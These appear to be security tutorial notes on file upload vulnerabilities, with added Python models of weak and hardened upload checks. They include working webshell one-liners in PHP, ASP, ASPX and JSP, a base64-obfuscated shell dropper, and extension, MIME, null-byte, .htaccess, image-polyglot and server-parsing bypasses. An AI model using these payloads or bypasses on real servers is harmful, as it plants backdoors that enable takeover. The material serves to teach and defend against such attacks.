File Upload Vulnerability
1. What is a file upload
The client packages its data as a file and sends it to the server over a network protocol; the server parses the request and finally stores the data as a real file on its disk.
Over HTTP an upload is normally a POST request whose body is encoded as multipart/form-data: each file part carries a filename and a Content-Type header chosen by the client, followed by the file bytes. The server reads those fields and the content, decides whether to accept the file, and writes it to a storage directory. Everything in that request (filename, Content-Type, content) is under the sender's control, which is the root of every bypass described below.
2. Why file upload vulnerabilities arise
- Server misconfiguration (for example, the upload directory allows script execution)
- Upload restrictions that can be bypassed, or filtering that is too lax
- File upload vulnerabilities in open-source editors (rich-text editors that bundle their own upload handler)
- Web server parsing vulnerabilities that cause an uploaded file to be executed even though its name looks harmless
3. Hazards of file upload vulnerabilities
An attacker uploads a malicious file that the server hands to its script interpreter. Once the file executes, the attacker can run code on the server: query the database, manage files on disk, execute operating-system commands, and from there take over the whole website and the host.
Such a malicious file is called a WebShell.
Potentially Vulnerable Locations
Image upload function
Avatar upload function
Document upload function
4. WebShell
Definition
A webshell is a command-execution environment in the form of a web page (an asp, aspx, php, jsp or cgi script); it is also called a web page Trojan or backdoor.
Through this backdoor the attacker obtains the privileges of the web server process and can use it to upload and download files, read the database, execute commands, and so on.
Back door
A host has 65,536 TCP ports (and as many UDP ports), numbered 0 to 65535. Each open port is a door through which the computer offers a service to the outside world. An attacker abuses a service behind one of these doors to gain access to the server, then leaves a back door so that access survives without repeating the exploit. A webshell is a back door that lives behind the port the web server already opens.
Classification
Classified by size:
- One-sentence Trojan (one-liner): usually a single line of code
- Small shell (xiaoma, rendered as "pony" by machine translation): contains only a file upload or file write function, used as a foothold
- Big shell (dama, rendered as "Malaysia" by machine translation): contains many functions (file manager, command execution, database client); the code is usually encoded or obfuscated
Classified by script type:
- jsp
- asp
- aspx
- php
Features
- Most webshells are dynamic scripts (php, asp, aspx, jsp) rather than static files, and they act as Trojan backdoors.
- The traffic between the attacker and the shell travels over the same port the website already serves on (80, or 443 for HTTPS), so an ordinary network firewall lets it through; only content inspection (a WAF) can distinguish it from normal requests.
- A webshell normally leaves nothing in the system logs (no logon event, no new service). The only record is the request in the web server's access log, and for POST-based shells the command sits in the request body, which the access log does not store.
Attack process
- Exploit a web vulnerability (such as file upload) to get a file onto the server
- Upload the small shell (xiaoma)
- Use the small shell to write the big shell (dama)
- Remotely drive the webshell to execute commands
Common webshells
PHP
<?php eval($_GET['pass']); ?>
<?php eval($_POST['pass']); ?>
pass is the name of the request parameter; the PHP code to run is sent in that parameter (in the query string for the GET version, in the request body for the POST version), for example
http...?pass=phpinfo(); or ?pass=system('ipconfig');
ASP
<%eval request("pass")%>
ASPX
<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
(the "unsafe" argument lets the evaluated JScript.NET code use the full .NET API; without it eval runs in JScript.NET's restricted safe mode)
JSP
<% Runtime.getRuntime().exec(request.getParameter("i")); %>
This JSP variant only starts the process; it does not copy the command's output into the response. A usable version reads the process's InputStream and writes it to the page, or the attacker redirects the output to a file and fetches that.
5. The basic principle of a webshell
1. An executable script: a file in a language the web server executes, stored where the server will serve it.
2. Data transfer: the code or command to run arrives inside an HTTP request (query string, POST body, header, or cookie), so the shell file itself stays small and generic.
3. Execution of the passed data, in one of these ways:
- direct execution: eval on the received string
- file inclusion: include/require of a file (or stream) whose content the attacker controls
- dynamic function execution: calling a function whose name arrives in the request (a variable holding the name is invoked as a function)
- callback functions: handing the payload to a built-in that invokes another function on your behalf, such as array_map or call_user_func
One-line dropper (the "one-word pony")
<?php fputs(fopen("up.php","w"),'<?php eval($_POST["cmd"]);?>');?>
Creates up.php in the current directory; its content is the one-line PHP shell. A dropper like this is useful when the filter rejects eval but not plain file-writing calls, or when only one line can be injected.
Uploading the big shell through the small shell
Base64-encode the PHP source of the big shell. (The notes suggest a second round of base64 to get rid of characters such as + and =; a second layer does not guarantee that, because its output uses the same alphabet. When the string is sent as a request parameter, URL-encode it instead: in a form-encoded body a raw + is decoded as a space and = is a separator, which corrupts the payload.)
Create up.php and put the file-writing code in it:
<?php fputs(fopen(base64_decode('dXAucGhw'),'w'),base64_decode(base64_decode('<double-base64 of the PHP code>')));?>
base64_decode() decodes the strings at run time; dXAucGhw is the base64 encoding of up.php, so neither the target filename nor the shell source appears literally in the file, which defeats simple keyword filters.
Request this file once and the decoded big shell is written to the server.
6. WebShell management tools
1. China Chopper (caidao): dated, and known copies of the client itself carried a backdoor
2. Cknife
3. Weevely3 (ships with Kali)
4. AntSword
5. Behinder (Ice Scorpion)
Behinder encrypts the request and response bodies with AES, so devices that inspect content (WAF, IDS) see only opaque data; a network firewall that filters by port never saw anything unusual in the first place.
7. How file upload checks are implemented
- Client-side JavaScript check (front-end): checks the file extension before the form is submitted
- Server-side MIME type check: checks the Content-Type of the file part in the request
  (MIME reference: w3school.com.cn)
- Server-side directory path check: checks the path or directory parameter that accompanies the upload
- Server-side extension check: checks the filename's extension against a list
- Server-side content check: inspects the file content (magic number, rendering test, search for script code)
8. Bypass methods
General approach: intercept the upload request with Burp Suite and modify the filename, Content-Type or content so that it satisfies whatever check the server performs.
Bypassing client-side checks (front-end JavaScript)
Principle of client-side checks:
The upload page contains JavaScript that checks the file before submission, most often whether the file type or extension is on an allowed list. The check runs in the attacker's own browser, so it is not a security control.
Method:
Disable JavaScript in the browser (Firefox NoScript, the IE setting, or the browser's developer tools), or pick a file with an allowed extension so the check passes and then rename it to .php in the intercepted request with Burp.
Bypassing server-side checks
Principle of server-side checks:
Server-side code typically checks up to three things: the MIME type, the file extension, and the file content.
File magic number: the first few bytes of a file identify its format (for example FF D8 FF for JPEG, 89 50 4E 47 for PNG, 47 49 46 38 for GIF).
A list is given at File Format and Magic Number.
Use WinHex (or any hex editor, e.g. xxd on Linux) to view a file's magic number.
Bypass methods:
1. Bypassing MIME type checks
Principle:
The server reads the Content-Type header of the file part in the upload request and compares it with the types it accepts (e.g. image/jpeg). That header is set by the client.
Method:
Intercept the request with Burp Suite and change Content-Type to an accepted value (e.g. image/jpeg) while keeping the .php filename and PHP content.
2. Bypassing extension checks - blacklist
Principle (blacklist strategy):
Extensions on the blacklist are rejected; everything else is accepted. The list normally holds the common script extensions (php, asp, aspx, jsp ...), so any extension the list forgot, or any spelling of a listed one that the comparison does not normalize, gets through.
Methods:
- Case bypass (.pHp)
If the check compares the extension string as-is, a different capitalization is not on the list. Windows file systems are case-insensitive and Apache's handler mapping is usually case-insensitive too, so shell.pHp still executes.
- Trailing space bypass (.php followed by a space)
If the check does not trim the extension, "php " is not "php". Windows strips trailing spaces when creating the file, so it is saved as shell.php.
- Trailing dot bypass (.php.)
If the check does not strip trailing dots, the text after the last dot is empty and matches nothing. Windows removes the trailing dot when creating the file, so again shell.php lands on disk.
- ::$DATA bypass (.php::$DATA)
If the check does not handle ::$DATA, the extension looks like "php::$DATA". On NTFS, ::$DATA names the file's default data stream, so writing shell.php::$DATA writes shell.php; Windows drops the suffix.
- Apache multiple-extension parsing
Apache's mod_mime evaluates every extension in a multi-extension name. If PHP is enabled with an AddHandler directive for .php, a file such as aa.php.owf.rar (or even aa.php.jpg) is handed to the PHP handler because one of its extensions is .php; the unknown owf and rar extensions are simply ignored. The notes describe this as matching from right to left until a recognized extension is found. Servers that map PHP with a FilesMatch rule anchored on a final .php (the Debian/Ubuntu default) are not affected.
- .htaccess file (distributed configuration file)
Combined with a blacklist that forgot it, uploading a custom .htaccess defeats the extension check entirely.
.htaccess stands for Hypertext Access. It lets per-directory configuration override the server configuration, provided AllowOverride permits it.
Once it is in the upload directory, Apache reads and applies it for every request under that directory, so an .htaccess that maps .jpg (or any other extension) to the PHP handler makes subsequently uploaded "images" execute as PHP.
Note: the trailing space, trailing dot and ::$DATA tricks rely on Windows file-name handling; on Linux the odd name is stored verbatim and the file does not execute.
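The checks above can be modelled directly. The following Python is an added example, not code from these notes: a weak blacklist check of the kind the tricks target, a model of what Windows does to the file name when the file is created, and a hardened check that normalizes the name and looks at every extension. The blacklist contents and the sample filenames are constructed for the demonstration.

```python
"""Blacklist extension check: the weak form the bypasses target, and a hardened one.

Added example. BLACKLIST and the sample names are constructed for the demo.
"""

# A typical (constructed) blacklist: dangerous script extensions only.
BLACKLIST = {"php", "php3", "php4", "php5", "phtml", "asp", "aspx", "jsp", "jspx"}
# The hardened check also refuses Apache's per-directory config files.
HARDENED_BLACKLIST = BLACKLIST | {"htaccess", "htpasswd"}


def weak_blacklist_ok(filename: str) -> bool:
    """Compare the text after the last dot, verbatim, against the list.

    Case, trailing spaces or dots, ::$DATA and extra extensions all slip by.
    """
    ext = filename.rsplit(".", 1)[-1]
    return ext not in BLACKLIST


def stored_name_on_windows(filename: str) -> str:
    """What NTFS/Win32 actually creates for the name the check accepted.

    - 'x.php::$DATA' addresses the default data stream of x.php
    - trailing spaces and dots are dropped from the final name component
    On Linux the name is stored verbatim, so these two tricks do not apply.
    """
    name = filename.split("::$DATA", 1)[0]
    return name.rstrip(" .")


def hardened_blacklist_ok(filename: str) -> bool:
    """Normalize first, then reject if ANY extension is on the list.

    Checking every dot-separated component covers Apache's multi-extension
    handling (aa.php.owf.rar) as well as the Windows name tricks.
    A blacklist is still the weaker design: a whitelist plus a server-chosen
    filename is what an upload handler should use.
    """
    if "\x00" in filename:
        return False
    name = stored_name_on_windows(filename).lower()
    components = name.split(".")
    return not any(part in HARDENED_BLACKLIST for part in components[1:])


BYPASS_NAMES = [  # constructed test cases, one per trick in the notes
    "shell.pHp",
    "shell.php ",
    "shell.php.",
    "shell.php::$DATA",
    "aa.php.owf.rar",
    ".htaccess",
]


def compare(names):
    """Return {name: (weak_verdict, hardened_verdict, name_on_disk)}."""
    return {n: (weak_blacklist_ok(n), hardened_blacklist_ok(n), stored_name_on_windows(n))
            for n in names}


if __name__ == "__main__":
    for name, (weak, hard, disk) in compare(BYPASS_NAMES + ["photo.jpg"]).items():
        print(f"{name!r:24} weak={weak!s:5} hardened={hard!s:5} on disk: {disk!r}")
```

Every name in BYPASS_NAMES passes the weak check and is stored as shell.php (or as a live .htaccess) on Windows; the hardened check rejects all of them while still accepting photo.jpg.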
3. Bypassing extension checks - whitelist
Principle (whitelist strategy):
Only extensions on the whitelist (e.g. jpg, png, gif) are accepted; everything else is rejected. This is the right design, so bypasses target the gap between the string the check looks at and the name the file is finally saved under.
Bypass method: null-byte (00) truncation, either as %00 in a URL-encoded parameter or as a raw 0x00 byte in the request body.
The check reads the extension from the end of the name (the part after the last dot), while the code that saves the file hands the name to a C library call that stops at the first NUL byte.
Example: upload a file named aa.php%00.png
The whitelist check sees ".png" at the end and accepts the name. When the file is saved, the name is cut at the 0x00 byte, so what lands on disk is aa.php, and the whitelist has been bypassed.
This only works on PHP versions before 5.3.4 (later versions reject paths that contain NUL), and, when the name comes from a GET/POST parameter, only with magic_quotes_gpc off.
Note:
If the filename travels in the URL, write it as aa.php%00.png and the server URL-decodes %00 to a 0x00 byte. If it travels inside a multipart body (the usual case), a literal %00 would be stored as those three characters; the byte has to be inserted raw.
With Burp Suite: put a space where the NUL belongs, switch to the Hex tab, find that byte (20) and change it to 00.
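An added example, not code from these notes, that models the whole path in Python: it builds the multipart/form-data part that Burp would send, with a client-chosen Content-Type and a raw 0x00 byte in the filename, parses it the way a naive handler does, and shows how the MIME check, the whitelist check (extension after the last dot) and the save path (C string, cut at NUL) disagree. The boundary, upload directory and allowed list are constructed; the "server" functions are a model of pre-5.3.4 PHP behaviour, not PHP itself.

```python
"""Whitelist check vs. null-byte truncation, modelled end to end.

Added example: builds the multipart part Burp would send, parses it like a
naive handler, and shows where the whitelist check and the save path disagree.
All data is constructed; the 'server' is a model of PHP < 5.3.4, not PHP.
"""
import re

ALLOWED = {b"jpg", b"jpeg", b"png", b"gif"}          # constructed whitelist
BOUNDARY = b"----WebKitFormBoundaryX7a3kQ"              # constructed boundary
UPLOAD_DIR = "/var/www/html/uploads"                    # constructed path


def build_multipart(filename: bytes, content_type: bytes, data: bytes) -> bytes:
    """Body of a single-file multipart/form-data POST.

    filename and content_type are whatever the client puts there; Burp's hex
    view is how a raw 0x00 gets into the filename (a %00 inside the body would
    be stored literally, it is only decoded in URL parameters).
    """
    lines = [
        b"--" + BOUNDARY,
        b'Content-Disposition: form-data; name="upload"; filename="' + filename + b'"',
        b"Content-Type: " + content_type,
        b"",
        data,
        b"--" + BOUNDARY + b"--",
        b"",
    ]
    return b"\r\n".join(lines)


def parse_part(body: bytes) -> dict:
    """Pull filename, Content-Type and content out of the single part above."""
    headers, _, rest = body.partition(b"\r\n\r\n")
    filename = re.search(rb'filename="([^"]*)"', headers).group(1)
    ctype = re.search(rb"Content-Type: ([^\r\n]+)", headers).group(1)
    data = rest.split(b"\r\n--" + BOUNDARY + b"--", 1)[0]
    return {"filename": filename, "content_type": ctype, "data": data}


def weak_mime_ok(content_type: bytes) -> bool:
    """Trusts the client-supplied header: 'image/png' on a .php file passes."""
    return content_type.startswith(b"image/")


def weak_whitelist_ok(filename: bytes) -> bool:
    """Extension = bytes after the LAST dot, so 'aa.php\\x00.png' reads as png."""
    return filename.rsplit(b".", 1)[-1].lower() in ALLOWED


def saved_path_pre_534(upload_dir: str, filename: bytes) -> str:
    """PHP before 5.3.4 passed the name to the C runtime, which stops at NUL."""
    truncated = filename.split(b"\x00", 1)[0]
    return upload_dir + "/" + truncated.decode("latin-1")


def hardened_extension(filename: bytes):
    """Return the extension to store under, or None to reject.

    Rejects control bytes (NUL included), decodes strictly, and takes the
    extension only from a clean name. The caller should then store the file
    under a server-generated name such as <random>.<ext>, never the original.
    """
    if any(c < 0x20 or c == 0x7F for c in filename):
        return None
    try:
        name = filename.decode("utf-8")
    except UnicodeDecodeError:
        return None
    if "." not in name or "/" in name or "\\" in name:
        return None
    ext = name.rsplit(".", 1)[1].lower().encode()
    return ext.decode() if ext in ALLOWED else None


if __name__ == "__main__":
    body = build_multipart(b"aa.php\x00.png", b"image/png", b"<?php eval($_POST['cmd']); ?>")
    part = parse_part(body)
    print("MIME check:", weak_mime_ok(part["content_type"]))
    print("whitelist check:", weak_whitelist_ok(part["filename"]))
    print("saved as:", saved_path_pre_534(UPLOAD_DIR, part["filename"]))
    print("hardened:", hardened_extension(part["filename"]))
```

The two weak checks both say yes and the file is written as aa.php; the hardened check refuses the name outright because of the NUL byte, and even for a clean name it returns only an extension, leaving the actual filename to the server.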
4. Bypassing file content checks
Principle:
The server inspects the content of the uploaded file rather than its name to decide whether it is legitimate.
Two common checks:
- the file magic number (the first bytes)
- loading the file through an API or library, most often an image-rendering test, sometimes followed by re-encoding ("secondary rendering")
Bypass methods:
- Bypassing magic-number checks
Prepend the magic number of the claimed format to the file.
For example, to pass a JPEG check, start the file with FF D8 FF E0 00 10 4A 46 49 46 00 (SOI marker, APP0 marker, two-byte segment length 00 10, "JFIF" and a NUL). The notes list these bytes without the 00 after E0; the length field is two bytes. A check that only compares the first bytes is satisfied even though the rest of the file is PHP.
- Bypassing loading/rendering checks
Rendering test attacks - code injection
Principle: find a place inside a genuinely valid file where arbitrary bytes can be stored without breaking the decoder, and put the script code there.
Usually this is a comment or metadata area (a JPEG COM segment, a GIF comment extension, a PNG text chunk); the image still renders and the file structure stays intact. The result is a polyglot: a valid image and a valid PHP file at the same time.
Attacking secondary rendering - attack the file loader itself
Principle: when the server re-encodes the image, the attacker's comment is discarded, so the target becomes the decoding library. The attacker crafts a file that triggers a memory-corruption bug (such as an overflow) in that library; when the server loads the file for its test, the exploit runs shellcode inside the server process.
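An added example, not code from these notes, that covers the magic-number check and the comment-area injection in Python: a first-bytes detector of the kind the prefix trick defeats, the prefix trick itself, and a function that hides the payload in a JPEG COM segment so the segment structure stays valid. SAMPLE_JPEG is a constructed SOI/APP0/EOI header with no image data: enough to walk the segments, not a viewable picture.

```python
"""Magic-number check, the prefix trick, and a JPEG comment-segment polyglot.

Added example. SAMPLE_JPEG is a constructed SOI/APP0/EOI header with no image
data: enough to walk the segment structure, not a viewable picture.
"""

MAGIC = {                      # first bytes of the formats an upload form usually accepts
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",            # GIF87a / GIF89a
}
PHP_PAYLOAD = b"<?php eval($_POST['cmd']); ?>"
SAMPLE_JPEG = (
    b"\xff\xd8"                                                       # SOI
    b"\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"   # APP0/JFIF, length 16
    b"\xff\xd9"                                                       # EOI
)


def detect_by_magic(data: bytes):
    """What a 'magic number' upload check does: compare the first bytes only."""
    for kind, sig in MAGIC.items():
        if data.startswith(sig):
            return kind
    return None


def prefix_polyglot(kind: str, payload: bytes) -> bytes:
    """Crudest bypass from the notes: glue the signature in front of the script.

    Satisfies detect_by_magic(); fails any check that actually decodes the image.
    """
    return MAGIC[kind] + payload


def inject_jpeg_comment(jpeg: bytes, payload: bytes) -> bytes:
    """Hide the payload in a COM (0xFFFE) segment right after SOI.

    Decoders skip COM segments, so the image still renders, and the PHP tags
    sit in the file untouched. The 2-byte length counts itself, not the marker.
    """
    if not jpeg.startswith(b"\xff\xd8"):
        raise ValueError("not a JPEG")
    if len(payload) + 2 > 0xFFFF:
        raise ValueError("payload too long for a single COM segment")
    segment = b"\xff\xfe" + (len(payload) + 2).to_bytes(2, "big") + payload
    return jpeg[:2] + segment + jpeg[2:]


def jpeg_segments(jpeg: bytes):
    """Walk marker segments up to SOS/EOI: shows the structure survives injection."""
    segments, i = [], 2
    while i + 2 <= len(jpeg) and jpeg[i] == 0xFF:
        marker = jpeg[i + 1]
        if marker == 0xD9:                      # EOI has no length field
            segments.append((marker, b""))
            break
        if i + 4 > len(jpeg):
            break
        length = int.from_bytes(jpeg[i + 2:i + 4], "big")
        segments.append((marker, jpeg[i + 4:i + 2 + length]))
        i += 2 + length
        if marker == 0xDA:                      # SOS: entropy-coded data follows
            break
    return segments


def naive_content_scan(data: bytes) -> bool:
    """The other cheap content check: is script syntax anywhere in the file?

    Catches both tricks above. Re-encoding the image server side is stronger
    (it drops COM segments), which is why attackers then aim at the decoder.
    """
    return b"<?" in data or b"<script" in data.lower()


if __name__ == "__main__":
    poly = inject_jpeg_comment(SAMPLE_JPEG, PHP_PAYLOAD)
    print("detected as:", detect_by_magic(poly))
    print("segments:", [hex(m) for m, _ in jpeg_segments(poly)])
    print("payload present:", PHP_PAYLOAD in poly, "naive scan flags it:", naive_content_scan(poly))
```

The injected file still starts with FF D8 FF and parses as COM, APP0, EOI, so both a magic-number check and a structural walk accept it; only a scan for script syntax or a server-side re-encode removes the payload. Whether the server then executes the file still depends on its extension and the parsing rules in section 9.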
9. Web server parsing vulnerabilities
Apache parsing
As described under the blacklist bypasses: with AddHandler-style configuration every extension of a multi-extension name is considered, so aa.php.owf.rar is executed as PHP because the .php extension is present and owf and rar mean nothing to Apache.
IIS 6.0 parsing vulnerabilities
1. Directory parsing
Form: www.xxx.com/xx.asp/xx.jpg
Principle: IIS 6.0 treats every file inside a directory whose name ends in .asp as an ASP script, so an uploaded xx.jpg stored under a directory named xx.asp is executed.
2. File parsing
Form: www.xxx.com/xx.asp;.jpg
Principle: IIS 6.0 stops reading the filename at the semicolon when choosing the handler, so xx.asp;.jpg is treated as xx.asp and executed as ASP, while the upload check saw a .jpg extension.
IIS 7.0/7.5 parsing vulnerability
Form: any filename/any filename.php
Principle: IIS 7.0/7.5 running PHP over FastCGI has the same problem as Nginx below: appending "/anything.php" to the URL of any existing file makes that file execute as PHP.
Nginx parsing vulnerability
Form 1: any filename/any filename.php
Principle: a request such as test.jpg/x.php ends in .php, so Nginx routes it to php-fpm. The requested script does not exist, and with cgi.fix_pathinfo=1 (the php.ini default) PHP walks back along the path until it finds a file that exists, test.jpg, and executes that as PHP with /x.php as PATH_INFO. This is a configuration issue of PHP behind Nginx (or IIS) rather than a bug in Nginx itself; the fix is cgi.fix_pathinfo=0, or a try_files check in the php location, or simply no PHP execution at all in the upload directory.
Form 2: any filename%00.php
On old Nginx versions (<= 0.8.37 according to these notes) a %00 in the URI truncated the script path, so test.jpg%00.php was executed as PHP.
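The three parsing rules above, as an added Python model (not server code): which file each server actually executes for a given request path, and as what. The document root is a constructed set of paths, and the php-fpm model exposes the cgi.fix_pathinfo switch so the fix can be seen alongside the bug.

```python
"""Models of the three parsing rules in this section: which file executes, and how.

Added example, not server code. The filesystem is a constructed set of paths.
"""

SCRIPT_EXTS = {"php", "asp", "aspx", "jsp"}


def apache_multiext_handler(filename: str) -> str:
    """mod_mime with AddHandler: every extension counts, so a .php anywhere
    after the base name hands the file to the PHP handler (aa.php.owf.rar,
    aa.php.jpg). Returns the handler's extension, or 'static'."""
    exts = filename.lower().split(".")[1:]
    for ext in reversed(exts):                 # rightmost handler wins if several
        if ext in SCRIPT_EXTS:
            return ext
    return "static"


def iis6_runs_as_asp(path: str) -> bool:
    """IIS 6.0: '/x.asp/anything' (directory rule) and 'x.asp;anything'
    (';' ends the name when the handler is chosen) both execute as ASP."""
    segments = path.lower().strip("/").split("/")
    if any(seg.endswith(".asp") for seg in segments[:-1]):
        return True
    leaf = segments[-1].split(";", 1)[0]
    return leaf.endswith(".asp")


FILES = {"/index.php", "/uploads/test.jpg"}       # constructed document root


def php_fpm_script(request_path: str, exists=lambda p: p in FILES, fix_pathinfo=True):
    """What php-fpm executes for a URI that Nginx/IIS routed to it because it
    ends in .php. With cgi.fix_pathinfo=1 a missing script is 'fixed' by
    walking back to the longest existing prefix, which becomes SCRIPT_FILENAME
    and is executed as PHP; the remainder becomes PATH_INFO.
    Returns (script, path_info), or None when nothing would run."""
    if not request_path.lower().endswith(".php"):
        return None
    if exists(request_path):
        return request_path, ""
    if not fix_pathinfo:
        return None                             # cgi.fix_pathinfo=0: 'No input file specified'
    parts = request_path.split("/")
    for cut in range(len(parts) - 1, 1, -1):
        script = "/".join(parts[:cut])
        if exists(script):
            return script, "/" + "/".join(parts[cut:])
    return None


if __name__ == "__main__":
    print("apache aa.php.owf.rar ->", apache_multiext_handler("aa.php.owf.rar"))
    print("iis6 /www/xx.asp/xx.jpg ->", iis6_runs_as_asp("/www/xx.asp/xx.jpg"))
    print("iis6 /www/xx.asp;.jpg ->", iis6_runs_as_asp("/www/xx.asp;.jpg"))
    print("php-fpm /uploads/test.jpg/x.php ->", php_fpm_script("/uploads/test.jpg/x.php"))
    print("same with fix_pathinfo=0 ->", php_fpm_script("/uploads/test.jpg/x.php", fix_pathinfo=False))
```

With fix_pathinfo enabled the uploaded test.jpg is what runs; with it disabled the request fails. On the Nginx side the equivalent guard is a try_files check in the php location so that a non-existent script is answered with 404 before php-fpm is consulted, and the upload directory should have no PHP execution at all.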